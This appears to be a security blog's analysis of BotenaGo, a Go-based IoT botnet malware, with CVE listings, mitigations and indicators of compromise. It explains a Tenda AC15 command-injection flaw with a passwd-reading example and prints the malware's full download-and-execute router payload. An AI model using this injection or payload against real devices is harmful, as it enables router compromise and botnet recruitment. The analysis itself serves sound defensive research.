With the world adapting to going in and out of lockdowns due to successive waves of new variants of COVID, the threat actors are also doing something similar by utilising newer variants of Mirai. By now most would be familiar with Mirai malware that targeted IoT devices such as routers and IP cameras. This blog would be a continuation of the research presented at AVAR2020 by my teammates on Mirai variants, Sora and Echobot. 

Figure 1: BotenaGo Cyber Kill Chain


A new malware was identified to be infecting multiple IoT devices in the wild. On the surface this malware was very much similar to Mirai, the main difference being that this malware included exploit strings of some recent vulnerabilities and it was mainly written in Go programming language. This malware is named BotenaGo. It contains more than 30 exploits for devices such as routers, modems and NAS devices.

BotenaGo is a linux based ELF file which can be executed directly from the terminal. Telnet or SSH bruteforce can be used as the initial infection vector to enter in a victim’s machine as shown in figure 1. On execution, BotenaGo malware starts by initialising a global infection counter that will be printed onto the console screen. And a directory called dlrs is required for the malware to continue its execution else it fails stating that the directory is missing. Then comes actual malware execution which we will discuss later in the blog. Apart from these it opens two ports, 19412 and 31412 on the machine as shown in figure 2. These two ports can later be used by the attacker to send commands that are to be executed on some other machine.  The malware after printing the global infection counter onto the screen calls a function named scannerInitExploits(). The malware has a list of device fingerprints which are mapped to their respective exploit functions. These fingerprints are constructed to match the vulnerable device’s name or signature as shown in figure 3, figure 4, and figure 5.

Figure 2: Malware setting up backdoor
Figure 3: uc-httpd String
Figure 4: CMS web String
Figure 5: Boa 0.93 String

Infection Process

  • The malware opens two ports, 31412 and 19412. Using port 19412 it is possible to send targets to the malware.
  • On giving a target, the malware first sends a GET request to the target’s IP address. For which the target responds with the Signature string.
  • On receiving the response, the malware compares the received Signature string with its local Signature list. On a successful match the malware calls the respective mapped function which has the exploit code.
  • This exploit code is then run against the target to compromise it.

Let’s further explore BotenaGo’s functionality using a well known Tenda AC15 router vulnerability, CVE-2020-10987.


This is a vulnerability present in the httpd binary of Tenda AC15 router. The vulnerability stems from insufficient input sanitization of the POST parameter deviceName at /goform/setUsbUnload endpoint. This parameter is then directly passed into the doSystemCmd() function. This function executes bash commands that are passed to it. This vulnerability can be exploited by chaining multiple bash commands using semicolon(;). This endpoint is called when a mounted USB drive has to be unmounted from the device as shown in figure 6.

Figure 6: USB device unmounting

Using IDA, the httpd binary was disassembled as shown in figure 7. This shows us that the ‘deviceName’ parameter is being sent into the doSystemCmd() function. This can be further confirmed by debugging the httpd binary using Gdb and Gdb server. The breakpoints were set at the ‘formsetUsbUnload’ function which is called when the /goform/setUsbUnload endpoint is hit. By executing cURL command against the endpoint as shown in figure 9, it is possible to execute command(cat /etc/passwd) on the remote device. The output of /etc/passwd is shown in figure 10

Figure 7: Disassembly of formSetUsbUnload() function
Figure 8: Debugging httpd binary using GDB
Figure 9: cURL command to exploit httpd binary
Figure 10: Reading sensitive ‘passwd’ file from the vulnerable server

BotenaGo exploiting CVE-2020-10987

The exploitation process is the same as explained above. The malware on receiving the target’s IP address sends the GET request to determine the router make and model using its fingerprint. Then on determining that the router is Tenda AC15, the malware calls the main_infectFunctionTenda(). This function has the exploit code that is necessary for exploiting the vulnerability . The disassembly of this function shows that the endpoint ‘/goform/setUsbUnload’ is hit along with the parameter ‘deviceName’. Further, the ‘cs:main_tendaPayload’ is where chaining is used to append bash commands to the device name. The command instructs downloading shell code onto the /tmp directory and changing the execution privilege. The downloaded shell code is then executed on the vulnerable Tenda router. 

Complete Payload

/goform/setUsbUnload/.js?deviceName=A;cd /tmp;rm wget.sh;wget;chmod 777 wget.sh;sh wget.sh selfrep.tenda

Figure 11: Disassembly of BotenaGo’s Tenda router exploit code
Figure 12: BotenaGo’s Tenda router exploit shell code
Figure 13: BotenaGo’s Tenda router exploit shell code

Other Routers + Exploits

Other than Tenda, the malware includes more than 30 exploits for devices such as routers, modems, and NAS devices. The figure 14 shows the ‘main_infectFunction*’ functions for those  devices.

Figure 14: BotenaGo’s router exploit functions
Figure 15: Vulnerable Server Boa count in India
Figure 16: Vulnerable Broadband Router count in India

The following is the list of CVEs and their respective Vulnerable devices exploited by BotenaGo malware.

 Affected devices
CVE-2020-8515DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta,, and 1.4.4_Beta devices
CVE-2015-2051D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier

Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.
CVE-2017-6077NETGEAR DGN2200 devices with firmware through
CVE-2016-6277NETGEAR R6250 before, R6400 before, R6700 before, R6900, R7000 before, R7100LG before, R7300DST before, R7900 before, R8000 before, D6220, D6400, D7000
CVE-2018-10561, CVE-2018-10562GPON home routers
CVE-2013-3307Linksys X3000 1.0.03 build 001
CVE-2020-9377D-Link DIR-610
CVE-2016-11021D-Link DCS-930L devices before 2.12
CVE-2018-10088XiongMai uc-httpd 1.0.0
CVE-2020-10173Comtrend VR-3033 DE11-416SSG-C01_R02.A2pvI042j1.d26m
CVE-2013-5223D-Link DSL-2760U Gateway
CVE-2020-8958Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024
CVE-2019-19824TOTOLINK Realtek SDK based routers, this affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
CVE-2020-10987Tenda AC15 AC1900 version
CVE-2020-9054Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.2, Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
CVE-2017-18368ZyXEL P660HN-T1A v1 TCLinux Fw $ v001 / 3.40(ULM.0)b31 router distributed by TrueOnline
CVE-2014-2321ZTE F460 and F660 cable modems
CVE-2017-6334 NETGEAR DGN2200 devices with firmware through

Table 1: List of CVE and respective Vulnerable devices exploited by BotenaGo malware (source


  • Update all devices and applications, mainly the ones directly facing the external network.
  • Implement sufficient logging techniques
  • Prevent usage of devices for which the vendor support has been stopped.
  • Constantly monitor inbound and outbound traffic.

Indicators of Compromise (IOCs)

SHA2560c395715bfeb8f89959be721cd2f614d2edb260614d5a21e90cc4c142f5d83adBotenaGo malware hash
MD529cb03edd8b97afe1d3d95c0fc6fa249BotenaGo malware hash
URLhttp:// download link

Source : alienvault.com

Like what you're reading? Subscribe to our top stories.

If you want to subscribe to our monthly newsletter, please submit the form below.

    0 replies on “BotenaGo on the GO”